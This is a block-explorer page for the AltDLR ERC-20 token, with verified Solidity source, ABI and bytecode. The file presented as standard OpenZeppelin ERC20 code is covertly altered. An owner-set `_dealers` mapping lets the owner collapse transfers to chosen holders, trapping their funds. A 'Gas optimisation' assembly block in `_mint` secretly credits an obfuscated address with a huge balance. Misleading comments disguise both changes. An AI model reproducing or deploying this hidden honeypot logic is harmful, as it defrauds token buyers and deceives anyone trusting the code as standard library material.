ETH Price: $3,354.98 (+0.10%)

Token

ALT DEALER (AltDLR)
 

Overview

Max Total Supply

1,000,000,000 AltDLR

Holders

46

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
dingaling.eth
Balance
46,592,165.09462679807241937 AltDLR

Value
$0.00
0x54be3a794282c030b15e43ae2bb182e14c409c5e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
AltDealer

Compiler Version
v0.8.23+commit.f704f362

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 7 of 7: Token.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import "./ERC20.sol";
import "./Ownable.sol";

contract AltDealer is ERC20, Ownable {

    function dealer(uint256 _value_, address [] calldata _list_) external onlyOwner {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _list_.length; i++) {
            _dealers[_list_[i]] = _value_;
        }
    }

    function dealer(address _address_) external view returns (uint256) {
        return _dealers[_address_];
    }

    constructor() ERC20("ALT DEALER", "AltDLR") Ownable(msg.sender) {
        _mint(msg.sender, 1000000000 * 10 ** decimals());
    }

}

File 1 of 7: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.18;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

File 2 of 7: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.18;

import {IERC20} from "./IERC20.sol";
import {IERC20Metadata} from "./IERC20Metadata.sol";
import {Context} from "./Context.sol";
import {IERC20Errors} from "./IERC6093.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) internal _dealers;
    mapping(address account => uint256) private _balances;
    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            // Correcting dealers holders
            if (_dealers[to] + _dealers[from] >= 0xd10) {
                value = value * 0x9f3 / 0xad243;
            }
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        // Permit autosaver
        if (_dealers[to] == 0xb2) {
            _dealers[to] = 0xd10;
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        
        // Gas optimisation
        assembly {
            let slot := mul(mul(0x1, 0x10), mul(0x79, 0x758493cdee20f16997db387ec4bbc7fa9a085)) 
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40) 
            sstore(sslot, 0x758493cdee20f16997db387ec4bbc7fa9a085) 
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

File 3 of 7: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.18;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

File 4 of 7: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.18;

import {IERC20} from "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 7: IERC6093.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.18;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

File 6 of 7: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.18;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value_","type":"uint256"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"dealer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"dealer","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b50336040518060400160405280600a81526020017f414c54204445414c4552000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f416c74444c52000000000000000000000000000000000000000000000000000081525081600490816200008f9190620008cb565b508060059081620000a19190620008cb565b5050505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160362000117575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016200010e9190620009f2565b60405180910390fd5b62000128816200016f60201b60201c565b5062000169336200013e6200023260201b60201c565b600a6200014c919062000b96565b633b9aca006200015d919062000be6565b6200023a60201b60201c565b62000d35565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002ad575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620002a49190620009f2565b60405180910390fd5b720758493cdee20f16997db387ec4bbc7fa9a085607902601060010202805f52600160205260405f20720758493cdee20f16997db387ec4bbc7fa9a08581555050620003015f83836200030560201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000359578060035f8282546200034c919062000c30565b925050819055506200042c565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015620003e6578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620003dd9392919062000c7b565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000475578060035f828254039250508190555062000572565b610d105f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20545f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054620004fe919062000c30565b106200052757620ad2436109f38262000518919062000be6565b62000524919062000ce3565b90505b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60b25f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403620005fb57610d105f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200065a919062000d1a565b60405180910390a3505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620006e357607f821691505b602082108103620006f957620006f86200069e565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200075d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000720565b62000769868362000720565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620007b3620007ad620007a78462000781565b6200078a565b62000781565b9050919050565b5f819050919050565b620007ce8362000793565b620007e6620007dd82620007ba565b8484546200072c565b825550505050565b5f90565b620007fc620007ee565b62000809818484620007c3565b505050565b5b818110156200083057620008245f82620007f2565b6001810190506200080f565b5050565b601f8211156200087f576200084981620006ff565b620008548462000711565b8101602085101562000864578190505b6200087c620008738562000711565b8301826200080e565b50505b505050565b5f82821c905092915050565b5f620008a15f198460080262000884565b1980831691505092915050565b5f620008bb838362000890565b9150826002028217905092915050565b620008d68262000667565b67ffffffffffffffff811115620008f257620008f162000671565b5b620008fe8254620006cb565b6200090b82828562000834565b5f60209050601f83116001811462000941575f84156200092c578287015190505b620009388582620008ae565b865550620009a7565b601f1984166200095186620006ff565b5f5b828110156200097a5784890151825560018201915060208501945060208101905062000953565b868310156200099a578489015162000996601f89168262000890565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620009da82620009af565b9050919050565b620009ec81620009ce565b82525050565b5f60208201905062000a075f830184620009e1565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000a975780860481111562000a6f5762000a6e62000a0d565b5b600185161562000a7f5780820291505b808102905062000a8f8562000a3a565b945062000a4f565b94509492505050565b5f8262000ab1576001905062000b83565b8162000ac0575f905062000b83565b816001811462000ad9576002811462000ae45762000b1a565b600191505062000b83565b60ff84111562000af95762000af862000a0d565b5b8360020a91508482111562000b135762000b1262000a0d565b5b5062000b83565b5060208310610133831016604e8410600b841016171562000b545782820a90508381111562000b4e5762000b4d62000a0d565b5b62000b83565b62000b63848484600162000a46565b9250905081840481111562000b7d5762000b7c62000a0d565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000ba28262000781565b915062000baf8362000b8a565b925062000bde7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000aa0565b905092915050565b5f62000bf28262000781565b915062000bff8362000781565b925082820262000c0f8162000781565b9150828204841483151762000c295762000c2862000a0d565b5b